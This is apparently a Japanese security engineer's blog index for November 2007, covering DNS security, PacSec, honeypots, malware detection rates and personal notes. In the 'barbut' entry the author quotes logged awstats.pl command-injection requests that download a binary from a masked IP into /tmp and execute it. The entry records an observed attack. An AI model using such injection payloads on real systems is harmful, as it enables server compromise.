2007-11-01から1ヶ月間の記事一覧

roから

d.pl: Trojan.Perl.Shellbot.C FOUND

PacSec

到着 また、今年も土壇場で参加可能に!!

ミシュラン地図

http://youkoseki.com/michelin/ http://maps.open-log.net/michelin/ http://ah-huh.net/index.php?%A5%DF%A5%B7%A5%E5%A5%E9%A5%F3%A5%AC%A5%A4%A5%C9%B7%C7%BA%DC%C5%B9%A5%DE%A5%C3%A5%D7

lwresd

しらなかった windowsみたいなローカルキャッシュな働きするんだね 使えるアプリケーションがどのくらいあるのか気になるソースを #include <lwres/lwres.h> #include <lwres/netdb.h> gcc -llwres 。。。 で使えるみたいってのは見つけたので実験#こんぱいる % cc -O -pipe -march=pentium</lwres/netdb.h></lwres/lwres.h>…

送り手は控えめに、受け手はおおらかに

http://blog.livedoor.jp/dankogai/archives/50957586.html DoCoMo,auのメールアドレスの問題 アルファブロガーがblogで大きな声をあげるように 困っている人の声を正しい方法で伝えていくことも必要だとおもった どこに言ったらいいのか? なんらかのサービ…

PacSec 今週だ

いけるのか? http://www.pacsec.jp/agenda.html C8H10N4O2とC2H6O=カフェインと酒?

ほしいもの

PIXUS MP610 これどうなんだろう?これにしようかなぁキヤノン PIXUS MP610出版社/メーカー: キヤノン発売日: 2007/10/04メディア: Personal Computers購入: 2人 クリック: 26回この商品を含むブログ (69件) を見る GR DigitalⅡ [rakuten:kbest:10003473:det…

「世界が完全に思考停止する前に」

http://www.news.janjan.jp/living/0711/0711246140/1.php

MUSTANでも

http://mustan.ipa.go.jp/mustan_web/event_detail?year=2007&month=11&day=23&eventID=2007-11-23-Web-2 観測しているようですねぇ

BIND採用が進むDNSサーバー,ただし多くが攻撃されやすい誤設定

http://itpro.nikkeibp.co.jp/article/Research/20071121/287728/ ん〜 http://xn--y8jmg4a9b7g.jp/named.conf テンプレートはこんなんでいいですか?(兼用しちゃっている初心者用?)

barbut

ここ2,3日でこんなアクセスが、、、 named virtual hostのログにはなく、IPアドレスのログにしか出ていなかった GET /cgi-bin/awstats.pl?configdir=|echo;cd%20/tmp;wget%20xxx.xxx.xxx.xxx/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1 GET /awst…

DNSOPS BoF

とりあえず、これだけ聞きに秋葉原へ DNS Rebinding Attack 50万qpsを超えるDNS応答 AAAA j.gtld.biz サイバー攻撃対応演習 BBルータ調査 DNS Dayから こんなかんぢ 夜の部行きたかったなぁ

Project Keeper

http://www.sios.com/product/ProjectKeeper/index.html お試ししてみようかな とおもったけど、 動作環境が OS:Windows Server 2003、Red Hat Enterprise Linux、SUSE Linux Enterprise Server Application Server:WebSphere Application Server Community …

IIJのハニーポット

「マルウエアを専用装置で捕獲、挙動を解析」――IIJが新システム http://itpro.nikkeibp.co.jp/article/NEWS/20071115/287291/ ISPはマルウェアの実態をつかめていないのか:IIJのマルウェア捕獲計画 http://japan.zdnet.com/security/story/0,3800079245,203…

男性にとっての恐怖「痴漢冤罪」の回避方法

http://news.ameba.jp/domestic/2007/11/8320.html 刑法217条→刑事訴訟法 第二百十七条 らしい、それに逃亡する恐れがあれば逮捕できちゃう? http://law.e-gov.go.jp/htmldata/S23/S23HO131.html#10020000000010000000000000000000000000000000000000000000…

トラウマンガ

http://www13.ocn.ne.jp/~titititi/torauma/toraumanngakan.top.htm

雑談その2 DNS cache poisoning detection

DNS cache poisoning はdetectionが難しい responseのTTLをみてTTL以下の間隔で打ってくるresponseを検知する ロードバランサ内にたくさんのcacheがあると混乱する responseのあったRRについて他のcacheとのdiffをとる anycast等されていると無理がある 二重…

雑談

IPv4,v6ツリーを分けるのは難しい? ドメインレベルで分断、二面化? 歴史的経緯? 決め事という話もあるが…

週間スパ

[監視カメラ氾濫]社会の不気味 http://spa.fusosha.co.jp/weekly/ent_3269.php [賞味期限切れ→廃棄]はもったいない! http://spa.fusosha.co.jp/weekly/ent_3267.php

日本シーサート協議会

http://www.nca.gr.jp/

End of the world

http://www.rollingstone.com/politics/story/16956300/the_prophet_of_climate_change_james_lovelock 気候変動の研究者:地球温暖化はもう元に戻らない

CISSP Forum

ストラップとペンをもらってきた

Analysis of AS112 Traffic

http://public.oarci.net/files/workshop-2007/Faber-AS112v2.pdf おすすめで以下のように言われている 1.RFC1918のようなLocalなPTR ZONE authoritative を自分のところで作ろう http://tools.ietf.org/wg/dnsop/draft-ietf-dnsop-default-local-zones/ 2.…

malware(つづき)

昨日の話の続きで、、、 自分でやったところまででは 541binaryを手元にあったAntiVirusに掛けてみる TrendMicro:78% Kaspersky:80% ClamAV:68% なかんじ VirusTotalみたいなものでファイル一括で突っ込んで表で返してくれるサービスってないですかねぇ?

malware

そういえば、某方にnepenthesの話をしたらmalware解析してくれるらしい ということで 500binariesほど提供してみました

JANOG21

JANOG21プログラムリスト http://www.janog.gr.jp/meeting/janog21/agenda/index.html → 1/24 http://www.janog.gr.jp/meeting/janog21/agenda/day1.html → 1/25 http://www.janog.gr.jp/meeting/janog21/agenda/day2.html う〜ん行きたいけど…このネタだと…

Cyber Jihad続き

前回 http://d.hatena.ne.jp/skubota/20071106#1194351377 のつづきで http://www.avertlabs.com/research/blog/index.php/2007/11/07/cyber-jihad-ill-say-good-and-quiet-november-11-to-you/

自由とは何か

次の本はこれかな http://business.nikkeibp.co.jp/article/life/20071031/139200/?P=1 自由とは何か―監視社会と「個人」の消滅 (ちくま新書)作者: 大屋雄裕出版社/メーカー: 筑摩書房発売日: 2007/09メディア: 新書購入: 11人 クリック: 199回この商品を含…

プレゼン研修

どちらかと言えば講師のやり方が中心で… おちつき 視線 振る舞い 間 抑揚 ストーリー シナリオ 起承転結 練習 非単語 ここらへんに注意だそうだ 二日間びっちりで疲れた

Cyber Jihad

http://www.securityfocus.com/brief/619 http://isc.sans.org/diary.html?storyid=3615&rss あるとかないとかどっち?